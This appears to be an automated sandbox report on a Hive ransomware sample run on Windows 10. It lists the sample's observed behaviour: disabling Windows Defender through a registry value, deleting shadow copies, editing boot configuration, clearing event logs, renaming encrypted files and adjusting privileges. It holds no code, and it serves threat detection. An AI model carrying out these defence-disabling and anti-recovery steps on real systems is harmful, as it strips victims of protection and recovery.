Malware Analysis Report

2024-10-16 03:12

Sample ID: 220112-zlnz9adhf2
Target: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.7z
SHA256: d1b1f52ea8a58a52734e8e5a87838cbc1b0cdc277194a5390912127b1f1a208d
Tags: evasion ransomware trojan hive spyware stealer
Score: 10/10

Analysis Overview

Score: 10/10

SHA256: d1b1f52ea8a58a52734e8e5a87838cbc1b0cdc277194a5390912127b1f1a208d

Threat Level: Known bad

The file cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.7z was found to be: Known bad.

Malicious Activity Summary

evasion ransomware trojan hive spyware stealer

Modifies security service

Modifies Windows Defender Real-time Protection settings

Hive

Deletes Windows Defender Definitions

Deletes shadow copies

Modifies boot configuration data using bcdedit

Clears Windows event logs

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Runs net.exe

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Opens file in notepad (likely ransom note)

Runs ping.exe

MITRE ATT&CK (Enterprise Matrix V6)

Analysis: static1

Detonation Overview

Reported: 2022-01-12 20:48

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2022-01-12 20:48
Reported: 2022-01-12 20:53
Platform: win10-en-20211208
Max time kernel: 11s
Max time network: 125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msdaremr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\pt-BR\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\ado\msado21.tlb | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipscsy.xml | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipsita.xml | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\mn.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_6vPOjo3SHM00.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_O3eJ6NAmm9o0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ja-JP\TabTip.exe.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InputPersonalization.exe.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_fhj5uqEg0i00.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\msadc\adcvbs.inc | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\ado\de-DE\msader15.dll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_BrE7SfGNDFI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\boxed-delete.avi | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\pt-br.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_konMUSUuISU0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\pt.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_5xFbVdOVa6s0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Internet Explorer\en-US\hmmapi.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_eH64ombB-G00.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\jsse.jar.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_tbdh9qBrKy80.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\th.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_vskVFmk5ASc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fr-CA\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_heb.xml | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-dayi.xml | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\accessibility.properties.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_wPYuZEWt2_o0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\es.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_vUSk8e7r4C40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\uk.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_bTJdaUGm-300.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Internet Explorer\SIGNUP\install.ins.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_gU8zTUCKuqI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ja-JP\InputPersonalization.exe.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Internet Explorer\ja-JP\iexplore.exe.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_ck6QE6lo-C00.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_fr.jar.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_iVlGHb6cGpo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_zh_TW.jar.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_QWDShMEdjZU0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\ado\msado27.tlb | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\bg-BG\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\sv-SE\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Internet Explorer\en-US\ieinstal.exe.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\br.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_pVf4RmBDuKk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_DpoBaSyQiKU0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\invalid32x32.gif.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_GLFVhr7viu00.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\ba.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_ks8n0Ea6w0g0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\ko-kr.xml | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\uk-UA\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_1WYGLGA5Lak0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipsjpn.xml | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\bin\startNetworkServer.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_D1SnkZTNpOM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\LICENSE.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_dONKzwoUmCs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE\msinfo32.exe.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_sL2bo9ccq700.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\mshwLatin.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\Services\verisign.bmp | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msadcor.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\split.avi | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\lt.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_Y0SKeAHLr180.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClient.man.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_04G4rkwkJEo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_3-96XcqWjgE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\hu.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_N8RZdaiY1Bk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\sqlxmlx.rll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_V4hsctsr0680.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msadcor.dll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_bkgIS9F5Y_A0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1480 wrote to memory of 3812 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 3812 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 3812 wrote to memory of 3708 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 3812 wrote to memory of 3708 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 4128 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 4128 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 4128 wrote to memory of 3036 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 4128 wrote to memory of 3036 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 692 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 692 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 692 wrote to memory of 3500 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 692 wrote to memory of 3500 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 4072 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 4072 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 4072 wrote to memory of 8 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 4072 wrote to memory of 8 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 4276 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 4276 | N/A | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | C:\Windows\SYSTEM32\net.exe
PID 4276 wrote to memory of 4228 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
PID 4276 wrote to memory of 4228 | N/A | C:\Windows\SYSTEM32\net.exe | C:\Windows\system32\net1.exe
